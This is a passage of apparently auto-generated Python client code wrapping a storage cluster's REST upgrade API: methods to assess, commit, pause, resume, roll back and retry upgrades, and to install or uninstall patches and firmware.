# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/5/upgrade/cluster/assess', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_cluster_commit_item(self, cluster_commit_item, **kwargs): # noqa: E501
"""create_cluster_commit_item # noqa: E501
Commit the upgrade of a cluster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_commit_item(cluster_commit_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Empty cluster_commit_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_cluster_commit_item_with_http_info(cluster_commit_item, **kwargs) # noqa: E501
else:
(data) = self.create_cluster_commit_item_with_http_info(cluster_commit_item, **kwargs) # noqa: E501
return data
def create_cluster_commit_item_with_http_info(self, cluster_commit_item, **kwargs): # noqa: E501
"""create_cluster_commit_item # noqa: E501
Commit the upgrade of a cluster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_commit_item_with_http_info(cluster_commit_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Empty cluster_commit_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_commit_item'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_commit_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_commit_item' is set
if ('cluster_commit_item' not in params or
params['cluster_commit_item'] is None):
raise ValueError("Missing the required parameter `cluster_commit_item` when calling `create_cluster_commit_item`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_commit_item' in params:
body_params = params['cluster_commit_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/upgrade/cluster/commit', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_cluster_firmware_assess_item(self, cluster_firmware_assess_item, **kwargs): # noqa: E501
"""create_cluster_firmware_assess_item # noqa: E501
Start firmware upgrade assessment on cluster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_firmware_assess_item(cluster_firmware_assess_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Empty cluster_firmware_assess_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_cluster_firmware_assess_item_with_http_info(cluster_firmware_assess_item, **kwargs) # noqa: E501
else:
(data) = self.create_cluster_firmware_assess_item_with_http_info(cluster_firmware_assess_item, **kwargs) # noqa: E501
return data
def create_cluster_firmware_assess_item_with_http_info(self, cluster_firmware_assess_item, **kwargs): # noqa: E501
"""create_cluster_firmware_assess_item # noqa: E501
Start firmware upgrade assessment on cluster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_firmware_assess_item_with_http_info(cluster_firmware_assess_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Empty cluster_firmware_assess_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_firmware_assess_item'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_firmware_assess_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_firmware_assess_item' is set
if ('cluster_firmware_assess_item' not in params or
params['cluster_firmware_assess_item'] is None):
raise ValueError("Missing the required parameter `cluster_firmware_assess_item` when calling `create_cluster_firmware_assess_item`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_firmware_assess_item' in params:
body_params = params['cluster_firmware_assess_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/upgrade/cluster/firmware/assess', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_cluster_firmware_upgrade_item(self, cluster_firmware_upgrade_item, **kwargs): # noqa: E501
"""create_cluster_firmware_upgrade_item # noqa: E501
The settings necessary to start a firmware upgrade. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_firmware_upgrade_item(cluster_firmware_upgrade_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterFirmwareUpgradeItem cluster_firmware_upgrade_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_cluster_firmware_upgrade_item_with_http_info(cluster_firmware_upgrade_item, **kwargs) # noqa: E501
else:
(data) = self.create_cluster_firmware_upgrade_item_with_http_info(cluster_firmware_upgrade_item, **kwargs) # noqa: E501
return data
def create_cluster_firmware_upgrade_item_with_http_info(self, cluster_firmware_upgrade_item, **kwargs): # noqa: E501
"""create_cluster_firmware_upgrade_item # noqa: E501
The settings necessary to start a firmware upgrade. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_firmware_upgrade_item_with_http_info(cluster_firmware_upgrade_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterFirmwareUpgradeItem cluster_firmware_upgrade_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_firmware_upgrade_item'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_firmware_upgrade_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_firmware_upgrade_item' is set
if ('cluster_firmware_upgrade_item' not in params or
params['cluster_firmware_upgrade_item'] is None):
raise ValueError("Missing the required parameter `cluster_firmware_upgrade_item` when calling `create_cluster_firmware_upgrade_item`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_firmware_upgrade_item' in params:
body_params = params['cluster_firmware_upgrade_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/upgrade/cluster/firmware/upgrade', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_cluster_patch_abort_item(self, cluster_patch_abort_item, **kwargs): # noqa: E501
"""create_cluster_patch_abort_item # noqa: E501
Abort the previous action performed by the patch system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_patch_abort_item(cluster_patch_abort_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Empty cluster_patch_abort_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_cluster_patch_abort_item_with_http_info(cluster_patch_abort_item, **kwargs) # noqa: E501
else:
(data) = self.create_cluster_patch_abort_item_with_http_info(cluster_patch_abort_item, **kwargs) # noqa: E501
return data
def create_cluster_patch_abort_item_with_http_info(self, cluster_patch_abort_item, **kwargs): # noqa: E501
"""create_cluster_patch_abort_item # noqa: E501
Abort the previous action performed by the patch system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_patch_abort_item_with_http_info(cluster_patch_abort_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Empty cluster_patch_abort_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_patch_abort_item'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_patch_abort_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_patch_abort_item' is set
if ('cluster_patch_abort_item' not in params or
params['cluster_patch_abort_item'] is None):
raise ValueError("Missing the required parameter `cluster_patch_abort_item` when calling `create_cluster_patch_abort_item`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_patch_abort_item' in params:
body_params = params['cluster_patch_abort_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/upgrade/cluster/patch/abort', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_cluster_patch_patch(self, cluster_patch_patch, **kwargs): # noqa: E501
"""create_cluster_patch_patch # noqa: E501
Install a patch. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_patch_patch(cluster_patch_patch, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterPatchPatch cluster_patch_patch: (required)
:param bool skip_version_check: Bypass version checks. Defaults to false.
:param bool skip_conflict_check: Bypass conflict checks. Defaults to false.
:param bool skip_restricted_check: Bypass restricted checks. Defaults to false.
:param bool simultaneous: Install the patch on all nodes at once. Defaults to false.
:param bool rolling: Install the patch on one node at a time. Defaults to true.
:param bool skip_dependency_check: Bypass dependency checks. Defaults to false.
:return: CreateResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_cluster_patch_patch_with_http_info(cluster_patch_patch, **kwargs) # noqa: E501
else:
(data) = self.create_cluster_patch_patch_with_http_info(cluster_patch_patch, **kwargs) # noqa: E501
return data
def create_cluster_patch_patch_with_http_info(self, cluster_patch_patch, **kwargs): # noqa: E501
"""create_cluster_patch_patch # noqa: E501
Install a patch. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_patch_patch_with_http_info(cluster_patch_patch, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterPatchPatch cluster_patch_patch: (required)
:param bool skip_version_check: Bypass version checks. Defaults to false.
:param bool skip_conflict_check: Bypass conflict checks. Defaults to false.
:param bool skip_restricted_check: Bypass restricted checks. Defaults to false.
:param bool simultaneous: Install the patch on all nodes at once. Defaults to false.
:param bool rolling: Install the patch on one node at a time. Defaults to true.
:param bool skip_dependency_check: Bypass dependency checks. Defaults to false.
:return: CreateResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_patch_patch', 'skip_version_check', 'skip_conflict_check', 'skip_restricted_check', 'simultaneous', 'rolling', 'skip_dependency_check'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_patch_patch" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_patch_patch' is set
if ('cluster_patch_patch' not in params or
params['cluster_patch_patch'] is None):
raise ValueError("Missing the required parameter `cluster_patch_patch` when calling `create_cluster_patch_patch`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'skip_version_check' in params:
query_params.append(('skip_version_check', params['skip_version_check'])) # noqa: E501
if 'skip_conflict_check' in params:
query_params.append(('skip_conflict_check', params['skip_conflict_check'])) # noqa: E501
if 'skip_restricted_check' in params:
query_params.append(('skip_restricted_check', params['skip_restricted_check'])) # noqa: E501
if 'simultaneous' in params:
query_params.append(('simultaneous', params['simultaneous'])) # noqa: E501
if 'rolling' in params:
query_params.append(('rolling', params['rolling'])) # noqa: E501
if 'skip_dependency_check' in params:
query_params.append(('skip_dependency_check', params['skip_dependency_check'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_patch_patch' in params:
body_params = params['cluster_patch_patch']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/7/upgrade/cluster/patch/patches', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_cluster_pause_item(self, cluster_pause_item, **kwargs): # noqa: E501
"""create_cluster_pause_item # noqa: E501
Pause a running upgrade process. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_pause_item(cluster_pause_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Empty cluster_pause_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_cluster_pause_item_with_http_info(cluster_pause_item, **kwargs) # noqa: E501
else:
(data) = self.create_cluster_pause_item_with_http_info(cluster_pause_item, **kwargs) # noqa: E501
return data
def create_cluster_pause_item_with_http_info(self, cluster_pause_item, **kwargs): # noqa: E501
"""create_cluster_pause_item # noqa: E501
Pause a running upgrade process. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_pause_item_with_http_info(cluster_pause_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Empty cluster_pause_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_pause_item'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_pause_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_pause_item' is set
if ('cluster_pause_item' not in params or
params['cluster_pause_item'] is None):
raise ValueError("Missing the required parameter `cluster_pause_item` when calling `create_cluster_pause_item`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_pause_item' in params:
body_params = params['cluster_pause_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/7/upgrade/cluster/pause', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_cluster_resume_item(self, cluster_resume_item, **kwargs): # noqa: E501
"""create_cluster_resume_item # noqa: E501
Resume a paused upgrade process. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_resume_item(cluster_resume_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Empty cluster_resume_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_cluster_resume_item_with_http_info(cluster_resume_item, **kwargs) # noqa: E501
else:
(data) = self.create_cluster_resume_item_with_http_info(cluster_resume_item, **kwargs) # noqa: E501
return data
def create_cluster_resume_item_with_http_info(self, cluster_resume_item, **kwargs): # noqa: E501
"""create_cluster_resume_item # noqa: E501
Resume a paused upgrade process. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_resume_item_with_http_info(cluster_resume_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Empty cluster_resume_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_resume_item'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_resume_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_resume_item' is set
if ('cluster_resume_item' not in params or
params['cluster_resume_item'] is None):
raise ValueError("Missing the required parameter `cluster_resume_item` when calling `create_cluster_resume_item`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_resume_item' in params:
body_params = params['cluster_resume_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/7/upgrade/cluster/resume', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_cluster_retry_last_action_item(self, cluster_retry_last_action_item, **kwargs): # noqa: E501
"""create_cluster_retry_last_action_item # noqa: E501
Retry the last upgrade action, in-case the previous attempt failed. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_retry_last_action_item(cluster_retry_last_action_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterRetryLastActionItem cluster_retry_last_action_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_cluster_retry_last_action_item_with_http_info(cluster_retry_last_action_item, **kwargs) # noqa: E501
else:
(data) = self.create_cluster_retry_last_action_item_with_http_info(cluster_retry_last_action_item, **kwargs) # noqa: E501
return data
def create_cluster_retry_last_action_item_with_http_info(self, cluster_retry_last_action_item, **kwargs): # noqa: E501
"""create_cluster_retry_last_action_item # noqa: E501
Retry the last upgrade action, in-case the previous attempt failed. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_retry_last_action_item_with_http_info(cluster_retry_last_action_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterRetryLastActionItem cluster_retry_last_action_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_retry_last_action_item'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_retry_last_action_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_retry_last_action_item' is set
if ('cluster_retry_last_action_item' not in params or
params['cluster_retry_last_action_item'] is None):
raise ValueError("Missing the required parameter `cluster_retry_last_action_item` when calling `create_cluster_retry_last_action_item`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_retry_last_action_item' in params:
body_params = params['cluster_retry_last_action_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/upgrade/cluster/retry_last_action', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_cluster_rollback_item(self, cluster_rollback_item, **kwargs): # noqa: E501
"""create_cluster_rollback_item # noqa: E501
Rollback the upgrade of a cluster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_rollback_item(cluster_rollback_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Empty cluster_rollback_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_cluster_rollback_item_with_http_info(cluster_rollback_item, **kwargs) # noqa: E501
else:
(data) = self.create_cluster_rollback_item_with_http_info(cluster_rollback_item, **kwargs) # noqa: E501
return data
def create_cluster_rollback_item_with_http_info(self, cluster_rollback_item, **kwargs): # noqa: E501
"""create_cluster_rollback_item # noqa: E501
Rollback the upgrade of a cluster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_rollback_item_with_http_info(cluster_rollback_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Empty cluster_rollback_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_rollback_item'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_rollback_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_rollback_item' is set
if ('cluster_rollback_item' not in params or
params['cluster_rollback_item'] is None):
raise ValueError("Missing the required parameter `cluster_rollback_item` when calling `create_cluster_rollback_item`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_rollback_item' in params:
body_params = params['cluster_rollback_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/upgrade/cluster/rollback', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_cluster_upgrade_item(self, cluster_upgrade_item, **kwargs): # noqa: E501
"""create_cluster_upgrade_item # noqa: E501
The settings necessary to start an upgrade. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_upgrade_item(cluster_upgrade_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterUpgradeItem cluster_upgrade_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_cluster_upgrade_item_with_http_info(cluster_upgrade_item, **kwargs) # noqa: E501
else:
(data) = self.create_cluster_upgrade_item_with_http_info(cluster_upgrade_item, **kwargs) # noqa: E501
return data
def create_cluster_upgrade_item_with_http_info(self, cluster_upgrade_item, **kwargs): # noqa: E501
"""create_cluster_upgrade_item # noqa: E501
The settings necessary to start an upgrade. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_upgrade_item_with_http_info(cluster_upgrade_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterUpgradeItem cluster_upgrade_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_upgrade_item'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_upgrade_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_upgrade_item' is set
if ('cluster_upgrade_item' not in params or
params['cluster_upgrade_item'] is None):
raise ValueError("Missing the required parameter `cluster_upgrade_item` when calling `create_cluster_upgrade_item`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_upgrade_item' in params:
body_params = params['cluster_upgrade_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/9/upgrade/cluster/upgrade', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_cluster_patch_patch(self, cluster_patch_patch_id, **kwargs): # noqa: E501
"""delete_cluster_patch_patch # noqa: E501
Uninstall a patch. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_cluster_patch_patch(cluster_patch_patch_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str cluster_patch_patch_id: Uninstall a patch. (required)
:param bool skip_version_check: Bypass version checks. Defaults to false.
:param bool skip_conflict_check: Bypass conflict checks. Defaults to false.
:param bool skip_restricted_check: Bypass restricted checks. Defaults to false.
:param bool simultaneous: Uninstall the patch on all nodes at once. Defaults to false.
:param bool rolling: Install the patch on one node at a time. Defaults to true.
:param bool skip_dependency_check: Bypass dependency checks. Defaults to false.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_cluster_patch_patch_with_http_info(cluster_patch_patch_id, **kwargs) # noqa: E501
else:
(data) = self.delete_cluster_patch_patch_with_http_info(cluster_patch_patch_id, **kwargs) # noqa: E501
return data
